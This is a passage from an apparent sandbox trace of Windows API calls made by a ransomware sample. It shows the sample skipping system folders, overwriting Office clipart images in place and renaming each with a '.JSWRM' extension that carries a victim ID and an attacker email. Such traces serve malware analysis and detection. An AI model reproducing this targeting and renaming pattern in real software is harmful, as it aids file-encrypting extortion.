lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341557.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341557.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0089.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0089.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341557.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.609] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27304) returned 1 [0089.609] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6aa0) returned 0x24d210 [0089.610] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6aa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6aa0, lpOverlapped=0x0) returned 1 [0089.613] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.614] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6aa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6aa0, lpOverlapped=0x0) returned 1 [0089.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.614] CloseHandle (hObject=0x314) returned 1 [0089.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0089.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0089.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0089.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0089.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0089.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0089.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341557.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341557.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0089.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0089.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.615] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6873, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341559.JPG", cAlternateFileName="")) returned 1 [0089.615] lstrcmpiW (lpString1="J0341559.JPG", lpString2=".") returned 1 [0089.615] lstrcmpiW (lpString1="J0341559.JPG", lpString2="..") returned 1 [0089.615] lstrcmpiW (lpString1="J0341559.JPG", lpString2="...") returned 1 [0089.615] lstrcmpiW (lpString1="J0341559.JPG", lpString2="windows") returned -1 [0089.615] lstrcmpiW (lpString1="J0341559.JPG", lpString2="recovery") returned -1 [0089.615] lstrcmpiW (lpString1="J0341559.JPG", lpString2="perflogs") returned -1 [0089.615] lstrcmpiW (lpString1="J0341559.JPG", lpString2="documents and settings") returned 1 [0089.615] lstrcmpiW (lpString1="J0341559.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.615] lstrcmpiW (lpString1="J0341559.JPG", lpString2="system volume information") returned -1 [0089.615] lstrcmpiW (lpString1="J0341559.JPG", lpString2="msocache") returned -1 [0089.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0089.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341559.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341559.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341559.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0089.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341559.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341559.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341559.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0089.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341559.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.616] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26739) returned 1 [0089.616] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6870) returned 0x24d210 [0089.616] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6870, lpOverlapped=0x0) returned 1 [0089.619] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.619] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6870, lpOverlapped=0x0) returned 1 [0089.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.619] CloseHandle (hObject=0x314) returned 1 [0089.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0089.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0089.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0089.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0089.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0089.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.620] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341559.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341559.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0089.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.621] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa497, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341561.JPG", cAlternateFileName="")) returned 1 [0089.621] lstrcmpiW (lpString1="J0341561.JPG", lpString2=".") returned 1 [0089.621] lstrcmpiW (lpString1="J0341561.JPG", lpString2="..") returned 1 [0089.621] lstrcmpiW (lpString1="J0341561.JPG", lpString2="...") returned 1 [0089.621] lstrcmpiW (lpString1="J0341561.JPG", lpString2="windows") returned -1 [0089.621] lstrcmpiW (lpString1="J0341561.JPG", lpString2="recovery") returned -1 [0089.621] lstrcmpiW (lpString1="J0341561.JPG", lpString2="perflogs") returned -1 [0089.621] lstrcmpiW (lpString1="J0341561.JPG", lpString2="documents and settings") returned 1 [0089.621] lstrcmpiW (lpString1="J0341561.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.621] lstrcmpiW (lpString1="J0341561.JPG", lpString2="system volume information") returned -1 [0089.621] lstrcmpiW (lpString1="J0341561.JPG", lpString2="msocache") returned -1 [0089.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0089.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341561.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341561.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341561.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0089.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341561.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341561.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341561.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0089.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341561.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.622] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42135) returned 1 [0089.622] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa490) returned 0x24d210 [0089.622] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa490, lpOverlapped=0x0) returned 1 [0089.641] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.641] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa490, lpOverlapped=0x0) returned 1 [0089.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.643] CloseHandle (hObject=0x314) returned 1 [0089.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0089.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0089.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0089.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0089.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0089.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.644] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341561.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341561.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0089.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0089.645] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4794eb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4794eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e7b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341634.JPG", cAlternateFileName="")) returned 1 [0089.645] lstrcmpiW (lpString1="J0341634.JPG", lpString2=".") returned 1 [0089.645] lstrcmpiW (lpString1="J0341634.JPG", lpString2="..") returned 1 [0089.645] lstrcmpiW (lpString1="J0341634.JPG", lpString2="...") returned 1 [0089.645] lstrcmpiW (lpString1="J0341634.JPG", lpString2="windows") returned -1 [0089.645] lstrcmpiW (lpString1="J0341634.JPG", lpString2="recovery") returned -1 [0089.645] lstrcmpiW (lpString1="J0341634.JPG", lpString2="perflogs") returned -1 [0089.645] lstrcmpiW (lpString1="J0341634.JPG", lpString2="documents and settings") returned 1 [0089.645] lstrcmpiW (lpString1="J0341634.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.645] lstrcmpiW (lpString1="J0341634.JPG", lpString2="system volume information") returned -1 [0089.645] lstrcmpiW (lpString1="J0341634.JPG", lpString2="msocache") returned -1 [0089.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341634.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341634.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341634.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0089.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341634.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341634.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341634.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0089.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0089.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341634.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.646] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7803) returned 1 [0089.646] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e70) returned 0x205850 [0089.646] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, 